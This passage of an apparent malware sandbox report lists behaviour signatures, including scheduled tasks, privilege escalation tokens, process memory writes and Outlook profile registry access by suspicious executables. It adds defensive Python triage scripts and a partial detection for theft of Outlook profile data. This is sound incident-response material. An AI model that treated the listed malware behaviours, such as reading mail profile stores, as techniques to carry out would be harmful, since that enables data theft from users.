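Run it as-is to print the decoded fields. The same parser applies to any Blob exported from HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates on a suspect host; on a live machine, `Get-ChildItem Cert:\LocalMachine\Root | Where-Object Thumbprint -eq 'F1A578C4CB5DE79A370893983FD4DA8B67B2B064'` lists the certificate if it is present, and removing it from the ROOT store (and the matching key container) is part of remediation.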

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\Downloads\ProcessMonitor.zip:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\SysinternalsSuite.zip:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File opened for modification C:\$Extend\$Quota:$Q:$INDEX_ALLOCATION C:\Windows\system32\wbem\wmiprvse.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\System32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A (64 identical rows collapsed; taskmgr.exe is itself running in this detonation, see "taskmgr.exe /0" under Processes, and enumerating processes is its normal function, so these hits are not attributable to the sample)

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe N/A
N/A N/A \??\c:\program files (x86)\internet explorer\iexplore.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: 33 (LUID 33 = SeIncreaseWorkingSetPrivilege; name not resolved by the sandbox) N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\ProcessMonitor\Procmon64.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files\ProcessMonitor\Procmon64.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Procmon64.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Procmon64.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\sysint\Procmon64.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files\sysint\Procmon64.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: 33 (LUID 33 = SeIncreaseWorkingSetPrivilege) N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: 33 (LUID 33 = SeIncreaseWorkingSetPrivilege) N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\Files\XClient.exe N/A
Token: 33 (LUID 33 = SeIncreaseWorkingSetPrivilege) N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 (LUID 33 = SeIncreaseWorkingSetPrivilege) N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\Files\XClient.exe N/A
Token: 33 (LUID 33 = SeIncreaseWorkingSetPrivilege) N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\Files\built.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\Files\contorax.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Token: 33 (LUID 33 = SeIncreaseWorkingSetPrivilege) N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: 33 (LUID 33 = SeIncreaseWorkingSetPrivilege) N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\Files\Sentil.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe N/A
Token: 33 (LUID 33 = SeIncreaseWorkingSetPrivilege) N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\Files\Client-built.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77Security.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
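The table above mixes system binaries (taskmgr.exe, Explorer.EXE, firefox.exe) with executables running out of Desktop, AppData and ProgramData, and prints one privilege only as a raw LUID ("Token: 33"). The following Python triage script is an added example, not code from the report or from any sandbox vendor: it resolves bare LUIDs to names using the SE_*_PRIVILEGE constants from winnt.h, canonicalises the report's abbreviated "SeIncBasePriorityPrivilege" (assumed to mean SeIncreaseBasePriorityPrivilege), groups privileges per process, and flags SeDebugPrivilege / SeLoadDriverPrivilege enabled by anything living in a user-writable directory. The sample rows are constructed from the table; the user-writable path rule and the high-risk privilege list are this example's own assumptions.

```python
"""Triage of 'Suspicious use of AdjustPrivilegeToken' rows from a sandbox report.

Added example, not code from the report or from any sandbox vendor. SAMPLE_ROWS
is constructed from the table; USER_WRITABLE and HIGH_RISK are assumptions.
"""
import re
from collections import defaultdict

# LUID -> privilege name, per the SE_*_PRIVILEGE constants in winnt.h. Sandboxes
# print the bare LUID (e.g. "Token: 33") when name resolution fails.
PRIVILEGE_BY_LUID = {
    10: "SeLoadDriverPrivilege",
    11: "SeSystemProfilePrivilege",
    14: "SeIncreaseBasePriorityPrivilege",
    15: "SeCreatePagefilePrivilege",
    19: "SeShutdownPrivilege",
    20: "SeDebugPrivilege",
    30: "SeCreateGlobalPrivilege",
    33: "SeIncreaseWorkingSetPrivilege",
}

# The report abbreviates one privilege name; canonicalise it (assumption).
ALIASES = {"SeIncBasePriorityPrivilege": "SeIncreaseBasePriorityPrivilege"}

# Privileges whose enablement by a binary outside system paths deserves a look.
HIGH_RISK = {"SeDebugPrivilege", "SeLoadDriverPrivilege", "SeTcbPrivilege"}

# Locations a standard user can write to (assumption for this triage).
USER_WRITABLE = re.compile(
    r"^[a-z]:\\(users\\[^\\]+\\(appdata|desktop|downloads)|programdata)\\", re.I)

# "Token: <name-or-LUID> N/A <process path> N/A"; the path may contain spaces.
TOKEN_ROW = re.compile(r"^Token:\s+(\S+)\s+N/A\s+(.+?)\s+N/A$")


def parse_token_row(line):
    """Return (privilege_name, process_path) for one 'Token: ...' row, else None."""
    m = TOKEN_ROW.match(line.strip())
    if not m:
        return None
    token, path = m.group(1), m.group(2)
    if token.isdigit():
        name = PRIVILEGE_BY_LUID.get(int(token), f"LUID_{token}")
    else:
        name = ALIASES.get(token, token)
    return name, path


def triage(lines):
    """Group privileges per process; flag high-risk ones enabled from user-writable paths."""
    per_process = defaultdict(set)
    for line in lines:
        parsed = parse_token_row(line)
        if parsed:
            name, path = parsed
            per_process[path].add(name)
    flagged = {
        path: sorted(privs & HIGH_RISK)
        for path, privs in per_process.items()
        if privs & HIGH_RISK and USER_WRITABLE.match(path)
    }
    return dict(per_process), flagged


# Constructed sample: a subset of the rows in the table above.
SAMPLE_ROWS = [
    "Token: SeDebugPrivilege N/A C:\\Windows\\system32\\taskmgr.exe N/A",
    "Token: 33 N/A C:\\Users\\Admin\\Desktop\\Files\\Fast%20Download.exe N/A",
    "Token: SeIncBasePriorityPrivilege N/A C:\\Users\\Admin\\Desktop\\Files\\Fast%20Download.exe N/A",
    "Token: SeDebugPrivilege N/A C:\\Users\\Admin\\Desktop\\Files\\XClient.exe N/A",
    "Token: SeDebugPrivilege N/A C:\\ProgramData\\Microsoft Subsystem Framework\\winmsbt.exe N/A",
    "Token: SeLoadDriverPrivilege N/A C:\\Users\\Admin\\AppData\\Local\\Temp\\Procmon64.exe N/A",
    "Token: SeShutdownPrivilege N/A C:\\Windows\\Explorer.EXE N/A",
]

if __name__ == "__main__":
    _, flagged = triage(SAMPLE_ROWS)
    for path, privs in flagged.items():
        print(f"{path}: {', '.join(privs)}")
```

Run against the constructed rows, taskmgr.exe and Explorer.EXE drop out because they run from C:\Windows, Fast%20Download.exe drops out because its two privileges are low-value, and XClient.exe, winmsbt.exe and the copy of Procmon64.exe in Temp are returned as the processes to look at first. The path rule is deliberately coarse; a production version would key on signer and image hash rather than directory.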

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A (45 identical rows collapsed)
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A (19 identical rows collapsed)

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A (64 identical rows collapsed)

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A (22 identical rows collapsed)
N/A N/A C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe N/A (3 identical rows collapsed)
N/A N/A C:\Program Files\ProcessMonitor\Procmon64.exe N/A (3 identical rows collapsed)
N/A N/A C:\Users\Admin\AppData\Local\Temp\Procmon64.exe N/A (3 identical rows collapsed)
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A (3 identical rows collapsed)
N/A N/A C:\Program Files\sysint\Procmon64.exe N/A (3 identical rows collapsed)
N/A N/A C:\Users\Admin\Desktop\Files\XClient.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\key.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\pfntjejghjsdkr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\srtware.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\Desktop\Files\c3.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\TPB-1.exe N/A (2 identical rows collapsed)
N/A N/A C:\Windows\System32\NOTEPAD.EXE N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\svc.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\qNVQKFyM.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A (2 identical rows collapsed)
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A (2 identical rows collapsed)
N/A N/A C:\Users\Admin\Desktop\Files\nobody.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\99awhy8l.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif N/A
N/A N/A C:\Users\Admin\Desktop\Files\S%D0%B5tu%D1%80111.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1072 wrote to memory of 3176 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe (11 identical rows collapsed)
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe (45 identical rows collapsed)
PID 3176 wrote to memory of 2188 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe (8 identical rows collapsed)
Every row in this signature is firefox.exe writing into another firefox.exe process (1072 -> 3176 -> 4988 and 2188), the pattern produced when Firefox's parent process starts its own content processes; no sample binary appears as writer or target here.
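WriteProcessMemory hits are worth reading as a graph rather than a list: the question is which image wrote into which other image, and how often. The following Python script is an added example, not code from the report or from any sandbox vendor. It parses rows of this table's shape into counted parent-to-child edges and separates same-image edges (a process writing into a child with the same image, which is how a multi-process browser sets up its content processes) from cross-image edges, which are the ones to review first. The firefox rows in the sample are constructed from the table above; the final row is hypothetical (invented PIDs and invented image names, not anything the report shows) so that a cross-image edge appears in the output. The same-image rule is a noise-reduction heuristic, not proof that an edge is benign.

```python
"""Collapse 'Suspicious use of WriteProcessMemory' rows into counted parent->child edges.

Added example, not code from the report. SAMPLE_ROWS is constructed; its last
row is hypothetical. The same-image rule is a heuristic, not a verdict.
"""
import re
from collections import Counter

# "PID <a> wrote to memory of <b> N/A <writer image> <target image>"; both images
# may contain spaces, so the target is located by its leading drive letter
# (assumption: plain drive-letter paths, no \??\ device prefixes).
EDGE_ROW = re.compile(
    r"^PID (\d+) wrote to memory of (\d+)\s+N/A\s+(.+?)\s+([A-Za-z]:\\.+?)\s*$")


def parse_edge(line):
    """Return (src_pid, dst_pid, src_image, dst_image) for one row, else None."""
    m = EDGE_ROW.match(line.strip())
    if not m:
        return None
    src_pid, dst_pid, src_img, dst_img = m.groups()
    return int(src_pid), int(dst_pid), src_img, dst_img


def aggregate(lines):
    """Count identical edges; tag each with whether writer and target share an image."""
    counts = Counter(e for e in map(parse_edge, lines) if e)
    return [
        {"src_pid": s, "dst_pid": d, "src_image": si, "dst_image": di,
         "count": n, "same_image": si.lower() == di.lower()}
        for (s, d, si, di), n in counts.most_common()
    ]


def cross_image_edges(lines):
    """Edges where the writer's image differs from the target's: review these first."""
    return [e for e in aggregate(lines) if not e["same_image"]]


FIREFOX = "C:\\Program Files\\Mozilla Firefox\\firefox.exe"
SAMPLE_ROWS = (
    # constructed from the table above (counts reduced)
    [f"PID 1072 wrote to memory of 3176 N/A {FIREFOX} {FIREFOX}"] * 4
    + [f"PID 3176 wrote to memory of 4988 N/A {FIREFOX} {FIREFOX}"] * 2
    # hypothetical row, not from the report: invented PIDs and image names
    + ["PID 9001 wrote to memory of 9002 N/A "
       "C:\\Users\\Admin\\AppData\\Roaming\\example\\dropper.exe "
       "C:\\Windows\\System32\\notepad.exe"]
)

if __name__ == "__main__":
    for edge in aggregate(SAMPLE_ROWS):
        flag = "" if edge["same_image"] else "  <-- cross-image, review"
        print(f"{edge['src_pid']} -> {edge['dst_pid']} x{edge['count']}{flag}")
```

On the constructed input the two firefox edges collapse to one line each with their counts, and only the hypothetical dropper.exe -> notepad.exe edge is returned by cross_image_edges. A self-write into a same-named child can still be malicious (a dropped binary relaunching itself hollowed), so the heuristic orders the review queue; it does not close it.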

System policy modification

defense_evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\ C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} = "1" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
All four entries are written by the Microsoft Edge installer (setup.exe under EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp), and a scheduled updater run (MicrosoftEdgeUpdate.exe /ua /installsource scheduler) appears under Processes; treat this hit as updater activity during the detonation rather than as behaviour of the sample.

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Desktop\Files\bnkrigkawd.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Desktop\Files\bnkrigkawd.exe N/A
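The two rows above are the same finding seen through two keys: bnkrigkawd.exe, running from the user's Desktop, opens both locations where Outlook stores per-user profile data (the Office-versioned key and the older Windows Messaging Subsystem key). The Python detection below is an added example, not code from the report or from any sandbox vendor. It generalises the two key patterns (any SID, any Office version), parses rows of this table's shape, and reports every process that opens an Outlook profile store and is not on a small allow-list of expected readers. The two report rows are used as constructed input together with a constructed benign control row (OUTLOOK.EXE reading its own profile, hypothetical path); the allow-list is this example's own assumption.

```python
"""Flag unexpected processes opening Outlook profile stores in the registry.

Added example, not code from the report. The key patterns generalise the
outlook_office_path / outlook_win_path rows; EXPECTED_READERS is an assumption.
"""
import re

# Per-user Outlook profile stores, with SID and Office version left variable.
OUTLOOK_PROFILE_KEYS = [
    ("outlook_office_path",
     re.compile(r"\\Software\\Microsoft\\Office\\\d+\.\d+\\Outlook\\Profiles\\", re.I)),
    ("outlook_win_path",
     re.compile(r"\\Software\\Microsoft\\Windows NT\\CurrentVersion\\"
                r"Windows Messaging Subsystem\\Profiles\\", re.I)),
]

# Image names expected to read these stores (assumption; tune per environment).
EXPECTED_READERS = {"outlook.exe", "mapisp32.exe", "explorer.exe"}

# "Key opened <key path> <process path> N/A"; the key path may contain spaces
# ("Windows NT"), so the process path is located by its leading drive letter.
KEY_ROW = re.compile(r"^Key opened\s+(.+?)\s+([A-Za-z]:\\.+?)\s+N/A$")


def classify_key(key_path):
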